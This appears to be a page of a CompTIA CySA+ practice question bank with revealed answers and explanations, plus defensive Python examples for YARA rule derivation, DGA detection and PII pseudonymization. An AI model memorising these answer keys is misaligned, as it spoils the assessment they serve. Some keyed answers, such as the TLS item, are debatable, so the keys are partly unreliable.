CompTIA CySA+ CS0-003 — Questions 751–825

989 questions total · 14 pages · All types, answers revealed

Page 11 of 14
751
MCQ · medium

An analyst has several malware samples from the same campaign and wants to detect related files based on unique strings and byte patterns. Which method is MOST appropriate?

A.Tune DHCP lease duration
B.Use only a firewall deny rule for port 443
C.Create and test a YARA rule against known-good and known-bad samples
D.Create a CVE entry
Answer: C

YARA rules are suitable for identifying malware families using file strings, byte sequences, and conditions.

Why this answer

YARA rules are specifically designed to identify and classify malware samples based on textual or binary patterns, including unique strings and byte sequences. By testing a YARA rule against known-good and known-bad samples, the analyst can validate its accuracy and ensure it reliably detects related files from the same campaign while minimizing false positives.

Exam trap

The CS0-003 exam often tests the distinction between detection methods (YARA) and network-level controls (DHCP, firewall) or vulnerability management (CVE), leading candidates to choose a familiar but irrelevant option like a firewall rule.

How to eliminate wrong answers

Option A is wrong because tuning DHCP lease duration affects network address assignment and renewal timing, not malware detection or file analysis. Option B is wrong because using only a firewall deny rule for port 443 would block HTTPS traffic but does not help identify or correlate malware samples based on strings or byte patterns. Option D is wrong because creating a CVE entry is a formal process for documenting a vulnerability, not a method for detecting related malware files based on unique strings or byte patterns.
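As an added example (not part of the original question set), the Python below does the "create and test" step on a constructed corpus: it extracts printable strings the way the `strings` tool does, keeps only those present in every known-bad sample and absent from every known-good one, validates the result for detections and false positives, and emits the rule in YARA syntax. The sample bytes, file names, mutex name, C2 path and rule name are invented for the example; against a real corpus the emitted rule would then be compiled and tested with yara or yara-python.

```python
import re

# Constructed sample corpus for this example (no real malware). Three "campaign"
# files share a mutex name and a C2 path; the benign files share only generic
# library names with them.
BAD_SAMPLES = {
    "dropper.exe": b"MZ\x90\x00" + b"\x00" * 8 +
                   b"Global\\Mtx_Q7zP9kLd\x00/cdn/gate.php\x00kernel32.dll\x00ws2_32.dll\x00",
    "loader.dll":  b"MZ\x90\x00" + b"\xff" * 8 +
                   b"ws2_32.dll\x00Global\\Mtx_Q7zP9kLd\x00/cdn/gate.php\x00",
    "update.scr":  b"MZ\x90\x00/cdn/gate.php\x00kernel32.dll\x00"
                   b"Global\\Mtx_Q7zP9kLd\x00padding-bytes-here\x00",
}
GOOD_SAMPLES = {
    "notepad.exe": b"MZ\x90\x00kernel32.dll\x00user32.dll\x00Global\\MsftNotepadMutex\x00",
    "putty.exe":   b"MZ\x90\x00ws2_32.dll\x00kernel32.dll\x00PuTTY-Release\x00",
}


def extract_strings(data, min_len=6):
    """Printable-ASCII runs of at least min_len bytes, as `strings` would print."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return {m.group().decode("ascii") for m in pattern.finditer(data)}


def derive_signature_strings(bad, good, min_len=6):
    """Strings common to every bad sample that never occur in a good sample."""
    per_bad = [extract_strings(d, min_len) for d in bad.values()]
    common = set.intersection(*per_bad)
    benign = set().union(*(extract_strings(d, min_len) for d in good.values()))
    return sorted(common - benign)


def rule_matches(sig_strings, data):
    """Mirror of the emitted condition: PE magic plus all signature strings."""
    return data[:2] == b"MZ" and all(s.encode("ascii") in data for s in sig_strings)


def validate(sig_strings, bad, good):
    """Detection/false-positive counts over the labelled corpus."""
    detected = sum(rule_matches(sig_strings, d) for d in bad.values())
    false_pos = sum(rule_matches(sig_strings, d) for d in good.values())
    return {"detected": detected, "missed": len(bad) - detected, "false_positives": false_pos}


def render_yara_rule(name, sig_strings):
    """Emit the rule in YARA syntax; 'all of them' keeps it specific to the campaign."""
    lines = [f"rule {name}", "{", "    strings:"]
    for i, s in enumerate(sig_strings):
        escaped = s.replace("\\", "\\\\").replace('"', '\\"')
        lines.append(f'        $s{i} = "{escaped}"')
    lines += ["    condition:", "        uint16(0) == 0x5A4D and all of them", "}"]
    return "\n".join(lines)


if __name__ == "__main__":
    sig = derive_signature_strings(BAD_SAMPLES, GOOD_SAMPLES)
    print(validate(sig, BAD_SAMPLES, GOOD_SAMPLES))
    print(render_yara_rule("campaign_x_dropper", sig))
```

The validation step is the part the question rewards: a string set that fires on the benign corpus is tightened (or switched to `N of them` with a higher N) before the rule is deployed, and strings that are generic library names drop out automatically because they appear in the known-good set.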

752
MCQ · hard

During a post-incident review, the team identifies that detection was delayed because alerts from multiple sources were not correlated. Which improvement would BEST address this issue?

A.Disable non-critical alerts
B.Implement a SIEM solution
C.Increase the number of security staff
D.Increase logging verbosity
Answer: B

SIEM correlates logs and alerts to detect incidents faster.

Why this answer

A SIEM (Security Information and Event Management) platform ingests logs and alerts from many sources into one place and applies correlation rules across them, so a multi-stage intrusion that looks benign in each source on its own surfaces as a single, earlier alert. More staff or more verbose logs do not help if the events are never joined.

753
MCQ · medium

An organization uses OpenSCAP to perform compliance scanning. The scan results indicate that a system fails to meet a STIG requirement. Which of the following best describes the purpose of STIGs?

A.They are used solely for web application security
B.They are vulnerability scoring standards
C.They are industry-standard benchmarks for cloud security
D.They are developed by the DoD to secure its information systems
Answer: D

STIGs are official DoD guidelines.

Why this answer

STIGs (Security Technical Implementation Guides) are detailed configuration and hardening standards published by DISA for DoD information systems. OpenSCAP evaluates a host against SCAP content derived from a STIG and reports each failed rule, which is what the scan in the question returned.

754
MCQ · medium

During a ransomware attack, several workstations have been encrypted. The incident response team has identified the ransomware variant and determined it does not have a known decryption tool. Which containment strategy is MOST appropriate?

A.Disconnect the affected workstations from the network, but leave them powered on.
B.Power off all affected workstations immediately.
C.Run a full antivirus scan on the affected workstations.
D.Restore all affected workstations from backups immediately.
Answer: A

Disconnecting from network stops lateral movement while preserving evidence.

Why this answer

Disconnecting the affected workstations from the network (but leaving them powered on) preserves volatile evidence in memory (e.g., encryption keys, process artifacts) and prevents the ransomware from spreading to other hosts via SMB, RDP, or other lateral movement protocols. Powering off would destroy this critical forensic data, while leaving them connected risks further encryption of network shares.

Exam trap

CompTIA often tests the misconception that immediate power-off is best for safety, but the trap here is that preserving volatile memory for forensic analysis is prioritized over a simple shutdown, especially when no decryption tool exists and evidence may lead to key recovery.

How to eliminate wrong answers

Option B is wrong because immediately powering off workstations destroys volatile memory (RAM) that may contain the ransomware's encryption keys, process handles, or network connections, hindering forensic analysis and potential decryption. Option C is wrong because running a full antivirus scan on already-encrypted files is ineffective—the ransomware binary may be removed, but encrypted files remain unrecoverable without a decryption tool, and scanning consumes time that could allow further spread. Option D is wrong because restoring from backups before containing the threat risks re-infection if the ransomware is still active on the network or if backups are also encrypted; containment must precede recovery.

755
MCQ · easy

A security analyst is reviewing a vulnerability scan report and sees a plugin with a CVSS v3.1 base score of 7.5. The attack vector is 'Network', attack complexity is 'Low', privileges required is 'None', user interaction is 'None', scope is 'Unchanged', and the confidentiality impact is 'High', but integrity and availability impacts are 'None'. This vulnerability is best described as:

A.A remote code execution vulnerability
B.A denial of service vulnerability
C.An information disclosure vulnerability
D.A privilege escalation vulnerability
Answer: C

High confidentiality impact with no other impacts indicates information disclosure.

Why this answer

The vector string is CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N. The exploitability half describes a remote, unauthenticated, zero-interaction attack, but the impact half touches only confidentiality, which is the definition of an information disclosure. The number alone does not identify the class: a pure denial of service (C:N/I:N/A:H) with the same exploitability metrics also scores 7.5, so the analyst has to read the C/I/A sub-metrics, not the headline score.

756
MCQ · medium

After containing a compromised host, analysis shows persistence through a scheduled task and a stolen service account. What is required before recovery?

A.Reconnect the host because users need it
B.Disable logging to improve performance
C.Close the incident after isolation
D.Remove persistence, rotate affected credentials, and verify no related hosts remain compromised
Answer: D

Recovery should follow eradication of the persistence mechanism and rotation of the exposed credentials.

Why this answer

Option D is correct because after containment the incident response process requires removing the persistence mechanism (the scheduled task), rotating the stolen service account credentials so the attacker cannot simply re-authenticate, and checking related hosts for the same task or the same account's logons (a lateral movement check). This aligns with NIST SP 800-61, whose containment, eradication and recovery phase removes the attacker's footholds before systems are returned to service.

Exam trap

CompTIA often tests the misconception that isolation alone is sufficient to close an incident, but the trap here is that persistence and credential theft require active eradication and verification steps before recovery can begin.

How to eliminate wrong answers

Option A is wrong because reconnecting a compromised host without eradication risks re-infection or lateral movement, violating containment principles. Option B is wrong because disabling logging during an incident blinds the responders and destroys the evidence needed to scope the compromise and support any later legal action; logging is critical for post-incident analysis. Option C is wrong because closing the incident after isolation without eradication and verification leaves the persistence mechanism and stolen credentials active, allowing the attacker to regain access.

757
MCQ · medium

In a regulated payment environment, a malware alert affects a single kiosk with no sensitive access. A second alert shows the same malware on a domain admin workstation. What should drive severity?

A.Whether the alert arrived first
B.Business impact, privilege level, asset criticality, and spread potential
C.Alphabetical order of hostnames
D.The analyst's preferred dashboard theme
Answer: B

Severity should reflect impact and risk, not alert order or the malware family name alone.

Why this answer

Option B is correct because severity in incident response must be driven by business impact, privilege level, asset criticality, and spread potential. The domain admin workstation has elevated privileges and access to sensitive systems, making it a higher priority than a non-sensitive kiosk, regardless of alert order. This aligns with NIST SP 800-61 and common IR frameworks that prioritize containment based on risk, not chronology.

Exam trap

The CS0-003 exam often tests the misconception that alert chronology or simple asset labels determine severity, when in fact the correct approach is a risk-based assessment incorporating business impact, privilege, criticality, and spread potential.

How to eliminate wrong answers

Option A is wrong because alert arrival time is irrelevant to severity; a later alert on a critical asset should supersede an earlier alert on a low-value asset. Option C is wrong because alphabetical order of hostnames has no bearing on risk or incident response priority. Option D is wrong because an analyst's preferred dashboard theme is a cosmetic preference and does not influence severity decisions.

758
MCQ · hard

A vulnerability assessment identifies that an external-facing server has an outdated TLS version configured. The server supports TLS 1.0 and SSL 3.0. Which of the following is the MOST secure configuration change?

A.Upgrade to TLS 1.3 and disable all others
B.Disable TLS 1.0 and keep SSL 3.0
C.Enable TLS 1.2 and disable SSL 3.0 and TLS 1.0
D.Disable SSL 3.0 and enable TLS 1.2
Answer: C

Eliminates all insecure protocols and enables a secure one.

Why this answer

Option C is the keyed answer because it removes both protocols with known practical attacks, SSL 3.0 (POODLE) and TLS 1.0 (BEAST, and formally deprecated together with TLS 1.1 by RFC 8996), while enabling TLS 1.2, which every current client supports. TLS 1.2 is only as strong as the cipher suites offered with it, so the same change should drop RC4, 3DES and export suites and prefer ECDHE key exchange with AEAD suites (AES-GCM, ChaCha20-Poly1305). This configuration balances security with compatibility for modern clients.

Exam trap

The CS0-003 exam often tests the distinction between 'disabling only the most vulnerable protocol' (Option D) versus 'disabling all insecure protocols and enabling a secure one' (Option C), trapping candidates who forget that TLS 1.0 is also considered deprecated and insecure.

How to eliminate wrong answers

Option A is marked wrong by the key on compatibility grounds: a server that accepts only TLS 1.3 cannot be reached by any client limited to TLS 1.2, and the question asks for a change to the current configuration rather than a forward-looking upgrade. Where compatibility is not a concern, enabling TLS 1.3 alongside TLS 1.2 is the stronger production setting; what the exam tests is that both SSL 3.0 and TLS 1.0 must go. Option B is wrong because keeping SSL 3.0 enabled leaves the server vulnerable to the POODLE attack (CVE-2014-3566), which allows plaintext recovery from encrypted sessions. Option D is wrong because it only disables SSL 3.0 and does not disable TLS 1.0, leaving the server exposed to the BEAST attack (CVE-2011-3389) and the other weaknesses that led to TLS 1.0's deprecation.

759
MCQ · medium

A security analyst receives a threat intelligence report containing detailed Indicators of Compromise (IoCs) such as IP addresses, file hashes, and domain names. What is the MOST appropriate audience for distributing this type of report?

A.The Security Operations Center (SOC) team
B.External auditors
C.All employees in the organization
D.Senior executives and the board of directors
Answer: A

The SOC uses tactical IoCs to enhance detection and response.

Why this answer

Tactical intelligence, such as IoCs, is most useful for frontline technical teams like the SOC, who can use it to detect and block threats. Executives typically receive strategic intelligence.

760
MCQ · medium

A security analyst is creating a correlation rule in the SIEM to detect DGA (Domain Generation Algorithm) activity. Which of the following data points would be most useful to include in the rule?

A.High number of DNS queries to domains with high entropy and frequent NXDOMAIN responses
B.Multiple successful connections to a single external IP
C.Large data transfers over HTTPS
D.Unusual parent-child process relationships
Answer: A

These are classic indicators of DGA.

Why this answer

DGA domains are algorithmically generated and often have high entropy, frequent NXDOMAIN responses (because the domain may not yet be registered), and are rarely seen in the environment.
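Added example, not part of the original page: the correlation logic behind option A, written in Python over a constructed DNS resolver log. It computes the Shannon entropy of the registrable label, counts NXDOMAIN responses per client, and flags a client only when the high-entropy and NXDOMAIN signals coincide across several distinct domains. The log lines, client addresses and thresholds are invented and would be tuned against a real environment's baseline; the second-level-label extraction ignores the public suffix list, which is a simplification of the example.

```python
import math
from collections import defaultdict

# Constructed resolver log: timestamp, client IP, queried name, response code.
DNS_LOG = """\
2024-03-01T02:14:01Z 10.0.0.5 www.example.com NOERROR
2024-03-01T02:14:03Z 10.0.0.5 mail.example.com NOERROR
2024-03-01T02:14:09Z 10.0.0.5 cdn.example.net NOERROR
2024-03-01T02:14:10Z 10.0.0.5 login.example.com NOERROR
2024-03-01T02:15:00Z 10.0.0.9 xk3qz8v1mp0rt.com NXDOMAIN
2024-03-01T02:15:01Z 10.0.0.9 p9wq2ls7gh4dxe.net NXDOMAIN
2024-03-01T02:15:02Z 10.0.0.9 a7v1rn0sb3qlkt.com NXDOMAIN
2024-03-01T02:15:03Z 10.0.0.9 w2zxqk9p5lmvs.info NXDOMAIN
2024-03-01T02:15:04Z 10.0.0.9 h8y3tb6cnv1qrx.com NXDOMAIN
2024-03-01T02:15:05Z 10.0.0.9 j4kd9s2fpq7mzl.org NOERROR
2024-03-01T02:15:06Z 10.0.0.9 www.example.com NOERROR
2024-03-01T02:16:00Z 10.0.0.7 typo.exmaple.com NXDOMAIN
2024-03-01T02:16:05Z 10.0.0.7 www.example.com NOERROR
"""


def shannon_entropy(text):
    """Bits per character: 'aaaa' -> 0.0, 'abcd' -> 2.0; random labels score high."""
    if not text:
        return 0.0
    n = len(text)
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def sld_label(qname):
    """Label left of the TLD ('example' for 'www.example.com'). Assumption of
    the example: no public-suffix handling, so 'co.uk' style names would need it."""
    labels = qname.rstrip(".").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def parse_dns_log(text):
    for line in text.splitlines():
        if line.strip():
            ts, client, qname, rcode = line.split()
            yield ts, client, qname.lower(), rcode


def profile_clients(text, entropy_threshold=3.5):
    """Per-client query count, NXDOMAIN count and the set of high-entropy names."""
    stats = defaultdict(lambda: {"queries": 0, "nxdomain": 0, "high_entropy_domains": set()})
    for _, client, qname, rcode in parse_dns_log(text):
        s = stats[client]
        s["queries"] += 1
        if rcode == "NXDOMAIN":
            s["nxdomain"] += 1
        if shannon_entropy(sld_label(qname)) >= entropy_threshold:
            s["high_entropy_domains"].add(qname)
    return dict(stats)


def flag_dga_clients(text, min_queries=5, nx_ratio=0.5, min_high_entropy=3,
                     entropy_threshold=3.5):
    """Flag only when volume, NXDOMAIN ratio and distinct high-entropy names all
    exceed their thresholds; the thresholds are assumptions to tune per environment."""
    flagged = []
    for client, s in profile_clients(text, entropy_threshold).items():
        if s["queries"] < min_queries:
            continue
        if s["nxdomain"] / s["queries"] < nx_ratio:
            continue
        if len(s["high_entropy_domains"]) < min_high_entropy:
            continue
        flagged.append(client)
    return sorted(flagged)


if __name__ == "__main__":
    print(flag_dga_clients(DNS_LOG))
```

Requiring all three signals together is what keeps the rule quiet: the single NXDOMAIN from 10.0.0.7 is a typo, not a beacon, and 10.0.0.5's normal traffic never trips the entropy threshold, while 10.0.0.9 trips all three conditions at once.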

761
MCQ · medium

Network flow records show one database server sending large encrypted outbound transfers to an unfamiliar autonomous system during off-hours. Which next step gives the BEST triage value?

A.Assume encryption means the transfer is safe
B.Disable all outbound internet access for the organisation
C.Delete historical flow records to reduce SIEM cost
D.Correlate flow volume with database audit logs and the destination reputation
Answer: D

Flow data identifies suspicious transfer volume; database audit logs and destination context help determine whether sensitive data may have left.

Why this answer

Option D is correct because correlating flow volume with database audit logs and destination reputation provides direct evidence of whether the encrypted outbound transfer is legitimate database replication or exfiltration. This approach leverages existing security controls (flow records, audit logs, threat intelligence) to validate the activity without assuming encryption implies safety or disrupting operations.

Exam trap

The CS0-003 exam often tests the misconception that encryption guarantees safety (Option A) or that immediate blocking (Option B) is the best triage step, when in fact correlation with multiple data sources (Option D) is the proper detection engineering approach to reduce false positives while preserving signal.

How to eliminate wrong answers

Option A is wrong because encryption does not imply safety; attackers commonly use encryption to hide exfiltration, and assuming otherwise ignores the suspicious timing (off-hours) and unfamiliar ASN. Option B is wrong because disabling all outbound internet access is a drastic, disruptive response that would block legitimate business operations and is not a triage step; it violates the principle of least disruption during investigation. Option C is wrong because deleting historical flow records destroys forensic evidence needed for root cause analysis and compliance, and does not address the immediate triage need.

762
MCQ · hard

A developer supporting a hybrid workforce accidentally committed a cloud access key to a public repository. Logs show the key was used from an unfamiliar IP. What should be done first?

A.Wait to see whether charges increase
B.Disable or rotate the key and review actions performed with it
C.Block the developer's laptop from Wi-Fi
D.Ask the developer to delete the commit only
Answer: B

The exposed credential must be invalidated and its use scoped through the cloud provider's audit logs.

Why this answer

The correct first step is to disable or rotate the compromised cloud access key and review actions performed with it. This immediately revokes the attacker's access, preventing further unauthorized use, while the review of logs and API calls determines the scope of the breach. Waiting or blocking the developer's laptop does not address the exposed credential or the active threat from the unfamiliar IP.

Exam trap

The CS0-003 exam often tests the principle of immediate containment over investigation or blame; the trap here is choosing a delay tactic (Option A) or a non-technical, irrelevant action (Option C) instead of the direct, credential-focused containment step.

How to eliminate wrong answers

Option A is wrong because waiting to see whether charges increase is a passive, reactive approach that allows the attacker continued access, potentially leading to data exfiltration, resource abuse, and escalating costs. Option C is wrong because blocking the developer's laptop from Wi-Fi does not revoke the compromised cloud access key; the key can still be used from any other device or IP, and this action does not address the root cause or the ongoing threat. Option D is wrong because deleting the commit does not revoke the key either: it remains in the repository history, in any forks and clones, and in the caches of the secret scanners and attackers that already harvested it.

763
MCQ · medium

A security analyst is configuring a vulnerability scanner to assess internal servers. The goal is to identify missing patches and misconfigurations without impacting system performance. Which scan configuration is most appropriate?

A.Non-credentialed external scan
B.Full port scan with vulnerability detection
C.Credentialed internal scan
D.Agent-based scan with performance throttling
Answer: C

Credentialed scans provide comprehensive results with minimal impact on performance.

Why this answer

A credentialed scan uses authenticated credentials to access the target, allowing deeper checks for missing patches and misconfigurations without intrusive techniques. This provides accurate results with less impact than non-credentialed scans that might cause crashes.

764
MCQ · medium

During a traffic analysis, a security analyst notices repeated TCP SYN packets sent to an internal server from an external IP, but the server never responds with SYN-ACK. The external IP sends a new SYN packet every 30 seconds. What does this behavior most likely indicate?

A.A SYN flood attack
B.A misconfigured firewall dropping SYN-ACK packets
C.A TCP port scan
D.A half-open connection due to network latency
Answer: C

Repeated SYN packets to the same destination without response is typical of a port scan seeking open ports.

Why this answer

A closed port answers a SYN with a RST, so complete silence means the SYN never reached a listening TCP stack: the host is down or a filter is dropping the packets. A scanner that gets no reply treats the port as filtered, waits for its timeout and retries, which produces exactly this slow, regular pattern; a SYN flood would arrive at a far higher rate, and latency would delay the SYN-ACK rather than eliminate it. Before closing the ticket, confirm whether the destination ports vary across the retries (a scan) or stay fixed (more likely a misconfigured client or a beacon to a dead listener).

765
Multi-Select · medium

A security analyst needs to provide threat intelligence to different audiences. Which TWO of the following are appropriate dissemination approaches?

Select 2 answers
A.Sending tactical intelligence with IoCs to the SOC team
B.Publishing operational intelligence on the company intranet
C.Discussing classified threat data in public forums
D.Sharing raw intelligence feeds with all employees
E.Providing strategic intelligence reports to executives
Answers: A, E

SOC teams need IoCs for detection and response.

Why this answer

Strategic intelligence for executives helps them understand the threat landscape, while tactical intelligence for SOC teams provides IoCs for detection.

766
MCQ · hard

An analyst is preparing a report that includes Personally Identifiable Information (PII) from a data breach. The report will be shared with external auditors. Which of the following is the BEST practice for handling PII in the report?

A.Include full PII in the report for complete transparency
B.Encrypt the report and send it via email to auditors
C.Use tokenization or pseudonymization to mask PII while preserving analytical value
D.Remove all PII entirely, leaving only anonymized records
Answer: C

Enables audit without exposing sensitive data.

Why this answer

Option C is correct because tokenization or pseudonymization replaces PII with non-sensitive placeholders that retain referential integrity and analytical utility, allowing auditors to perform their review without exposing actual personal data. This approach balances transparency requirements with data minimization principles mandated by regulations like GDPR and PCI DSS, unlike full disclosure or simple encryption which still exposes the original data to the recipient.

Exam trap

CompTIA often tests the misconception that encryption alone is sufficient for data protection in reports, but the trap here is that encryption only secures data in transit or at rest, not after decryption by the recipient, whereas tokenization/pseudonymization provides persistent masking even after the data is accessed.

How to eliminate wrong answers

Option A is wrong because including full PII violates the principle of data minimization and unnecessarily exposes sensitive data to external parties, increasing breach risk and non-compliance with privacy regulations. Option B is wrong because encrypting the report only protects data in transit; once decrypted by the auditors, the full PII is exposed in plaintext, offering no ongoing protection against misuse or further disclosure. Option D is wrong because removing all PII entirely destroys the analytical value needed for audit correlation and verification, effectively rendering the report useless for its intended purpose.
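Added example, not from the original page: a keyed pseudonymization routine in Python that replaces the PII columns of breach-investigation rows with HMAC-SHA256 tokens. The same person gets the same token wherever they appear (referential integrity for the auditors), different keys give unrelated tokens, and the re-identification table stays with the data owner. The records, field names and key are constructed for the example; a real deployment would keep the key in an HSM or secrets manager and never ship it with the report.

```python
import hashlib
import hmac
import json

# Constructed rows (no real people). The same person appears twice, once with
# the e-mail in different case, to show that normalization preserves linkage.
BREACH_RECORDS = [
    {"name": "Alice Example", "email": "alice@example.com", "ssn": "123-45-6789",
     "access_time": "2024-03-01T02:14:01Z", "table": "customers"},
    {"name": "Bob Example", "email": "bob@example.com", "ssn": "987-65-4321",
     "access_time": "2024-03-01T02:14:05Z", "table": "customers"},
    {"name": "Alice Example", "email": "Alice@Example.com", "ssn": "123-45-6789",
     "access_time": "2024-03-01T02:20:11Z", "table": "payments"},
]
PII_FIELDS = ("name", "email", "ssn")


def canonical(value):
    """Normalize before tokenizing so case and spacing variants link together."""
    return " ".join(str(value).split()).lower()


def make_token(field, value, key):
    """Keyed pseudonym: HMAC-SHA256 over field name and value. Including the
    field name stops the same string in two fields from being linked, and the
    key (not a plain hash) stops an auditor from confirming guesses offline."""
    mac = hmac.new(key, f"{field}:{canonical(value)}".encode(), hashlib.sha256).hexdigest()
    return f"{field}_{mac[:16]}"


def pseudonymize(record, key, fields=PII_FIELDS):
    out = dict(record)
    for field in fields:
        if out.get(field) is not None:
            out[field] = make_token(field, out[field], key)
    return out


def pseudonymize_report(records, key):
    """Rows for the auditor: tokens in place of PII, analytical columns untouched."""
    return [pseudonymize(r, key) for r in records]


def build_reidentification_table(records, key, fields=PII_FIELDS):
    """Kept by the data owner and never shipped with the report: token -> original."""
    table = {}
    for r in records:
        for field in fields:
            if r.get(field) is not None:
                table[make_token(field, r[field], key)] = r[field]
    return table


if __name__ == "__main__":
    k = b"constructed-example-key-keep-out-of-the-report"
    print(json.dumps(pseudonymize_report(BREACH_RECORDS, k), indent=2))
```

This is pseudonymization in the GDPR sense, reversible by the key holder, rather than anonymization: the auditors can still say "the same customer's record was read from two tables three minutes apart" without ever seeing who that customer is.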

767
Multi-Select · medium

A security analyst is prioritizing vulnerabilities for remediation. Which TWO factors should be considered HIGHEST when determining prioritization? (Choose two.)

Select 2 answers
A.CVSS base score
B.Number of false positives associated with the scan
C.System owner's preference
D.Age of the vulnerability
E.Known exploit availability
Answers: A, E

CVSS score provides a standardized severity rating.

Why this answer

The CVSS base score provides a standardized, quantitative measure of a vulnerability's severity based on intrinsic characteristics like attack vector and complexity. Known exploit availability, for example a listing in CISA's Known Exploited Vulnerabilities catalog or a public proof of concept, supplies the likelihood side that the base score deliberately leaves out: a medium-severity flaw with a working exploit is often a more urgent fix than a critical one nobody can trigger. Together the two approximate risk, which is what drives remediation order in risk-based vulnerability management.

Exam trap

The CS0-003 exam often tests that candidates confuse vulnerability age with exploit maturity, but age alone is irrelevant without evidence of active exploitation or a functional exploit in the wild.

768
MCQ · hard

An analyst is performing static analysis on a suspicious executable. The analyst discovers that the PE file has a suspicious section name and a high entropy value. Which tool or technique would be MOST useful for further analyzing the packed nature of the file?

A.Extracting strings from the binary
B.Using a YARA rule to detect the packer
C.Using PEiD or similar packer identifier
D.Running the file in a sandbox
Answer: C

PEiD is designed to detect common packers, cryptors, and compilers.

Why this answer

PEiD, or a maintained equivalent such as Detect It Easy, matches the bytes at the file's entry point against signatures of known packers, cryptors and compilers. Section entropy close to 8 bits per byte and a non-standard section name (anything other than .text, .data, .rdata, .rsrc and the like) are the usual hints of packing, so identifying the packer is the step that tells the analyst how to unpack; until then string extraction yields little, and a sandbox shows behaviour without explaining the static artefacts.

769
MCQ · hard

A security analyst is investigating a suspected insider threat incident. The analyst needs to preserve evidence before containment. Which of the following actions should the analyst prioritize to maintain the integrity of digital evidence?

A.Imaging the suspect's hard drive using dd without a write blocker
B.Rebooting the suspect's computer to ensure no hidden processes are running
C.Using a write blocker to create a forensic image of the hard drive
D.Deleting suspicious files to prevent further damage
Answer: C

Write blockers prevent write access, preserving evidence integrity.

Why this answer

Preserving evidence before containment is crucial. Using a write blocker when imaging a hard drive ensures that the original data is not altered, maintaining the integrity of the evidence.

770
MCQ · easy

Which analysis technique involves examining the parent-child relationships of processes to identify potentially malicious activity?

A.Network analysis
B.Memory analysis
C.Registry analysis
D.Process analysis
Answer: D

Process analysis includes examining process trees and parent-child relationships to detect suspicious behavior.

Why this answer

Process analysis looks at process trees to find anomalies like a word processor spawning a command shell.

771
Multi-Select · easy

A security analyst is reviewing a vulnerability scan report and must prioritize remediation efforts. Which TWO factors are most important for prioritizing vulnerability remediation?

Select 2 answers
A.Time since vulnerability published
B.CVSS base score
C.Vendor patch release date
D.Number of hosts affected
E.Availability of public exploit code
Answers: B, E

CVSS base score is a key indicator of severity and is widely used for prioritization.

Why this answer

The CVSS base score (B) provides a standardized, vendor-neutral severity rating (0-10) that reflects the intrinsic characteristics of a vulnerability, such as attack vector, complexity, and impact on confidentiality, integrity, and availability, so vulnerabilities can be compared across systems independent of environmental factors. Availability of public exploit code (E) supplies the likelihood that the base score leaves out; severity and likelihood together approximate risk, which is what should set the remediation order.

Exam trap

CompTIA often tests the distinction between intrinsic severity (CVSS base score) and external risk factors (exploit availability), leading candidates to mistakenly prioritize the number of affected hosts (D) or patch release date (C) over these two key factors.

772
MCQ · hard

A SOC analyst receives an alert from a threat intelligence platform (TIP) about a new phishing campaign. The indicator is a URL. Which enrichment source is BEST for determining the URL's current hosting infrastructure?

A.VirusTotal
B.WHOIS
C.Shodan
D.Passive DNS
Answer: D

Passive DNS shows a domain's resolution history, including the addresses it currently resolves to.

Why this answer

Passive DNS records the IP addresses a domain has resolved to over time, as observed by sensor networks, so it reveals both the current hosting and any recent infrastructure changes. WHOIS describes the registrant, Shodan describes the services on an IP already known, and VirusTotal aggregates verdicts; none of them answers "where is this URL hosted right now" as directly.

773
MCQ · medium

Refer to the exhibit. A security analyst is reviewing SIEM logs and notices repeated entries from the same source IP. Which of the following actions should the analyst take NEXT?

A.Immediately block the source IP at the firewall
B.Check the baseline behavior of the source IP
C.Update the signature database
D.Isolate the affected system for forensic analysis
Answer: B

Comparing against baseline helps determine if the activity is truly anomalous and justifies further action.

Why this answer

Option B is correct because the first step in incident response is to validate whether the activity is malicious by comparing it against a known baseline. Repeated entries from the same source IP could indicate a benign automated process (e.g., a legitimate monitoring tool or scheduled scan) rather than an attack. Checking the baseline behavior prevents unnecessary disruption and aligns with the NIST SP 800-61 incident response framework's emphasis on identification and analysis before containment.

Exam trap

CompTIA often tests the candidate's ability to resist the impulse to immediately block or contain, emphasizing that verification against a baseline is the mandatory next step before any action in the incident response process.

How to eliminate wrong answers

Option A is wrong because immediately blocking the source IP without verifying the baseline could disrupt legitimate services (e.g., a corporate VPN concentrator or authorized vulnerability scanner) and violates the principle of least disruption during initial triage. Option C is wrong because updating the signature database is a preventive maintenance task for IDS/IPS systems, not a reactive step for analyzing a specific repeated log entry; it does not help determine if the source IP's behavior is anomalous. Option D is wrong because isolating the affected system for forensic analysis is a containment step that should only occur after confirming the activity is malicious; premature isolation can cause unnecessary downtime and data loss if the system is not actually compromised.

774
Multi-Select · medium

A security analyst is performing a web application security assessment and identifies a potential cross-site scripting (XSS) vulnerability. The application is critical to business operations. Which TWO of the following are appropriate immediate actions?

Select 2 answers
A.Take the application offline immediately
B.Implement a web application firewall (WAF) rule to block XSS payloads
C.Ignore the finding because XSS is low risk
D.Notify law enforcement immediately
E.Report the vulnerability to the development team for remediation
Answers: B, E

WAF can provide temporary mitigation.

Why this answer

Reporting the vulnerability to the development team ensures awareness, and implementing a WAF rule can provide temporary protection while a fix is developed.

775
MCQ · hard

A new cloud log source is onboarded, but analytics fail because source IP, user, and action fields are mapped inconsistently. What should the engineer fix?

A.Log normalization and field mapping in the parser
B.Disable all enrichment lookups
C.Increase the dashboard refresh interval
D.Move logs to cold storage immediately
Answer: A

Detection rules depend on consistent normalized fields across sources.

Why this answer

Log normalization and field mapping in the parser ensure that source IP, user, and action fields from the new cloud log source are consistently transformed into the schema expected by the SIEM or analytics platform. Without this, the analytics engine cannot correlate or alert on the data because the fields are not recognized or are mapped to incorrect attributes, leading to failed analytics.

Exam trap

The CS0-003 exam often tests the misconception that analytics failures are due to display or enrichment issues, when the real problem is almost always a parsing or normalization mismatch at the ingestion layer.

How to eliminate wrong answers

Option B is wrong because disabling all enrichment lookups would remove valuable context (e.g., geo-IP, threat intelligence) but does not fix the root cause of inconsistent field mapping; the logs would still be parsed incorrectly. Option C is wrong because increasing the dashboard refresh interval only changes how often the dashboard updates its display; it has no effect on how the raw log data is parsed or normalized, so the analytics would still fail. Option D is wrong because moving the logs to cold storage takes them out of the analytics tier altogether; the mapping problem is still there for any log that is later restored.
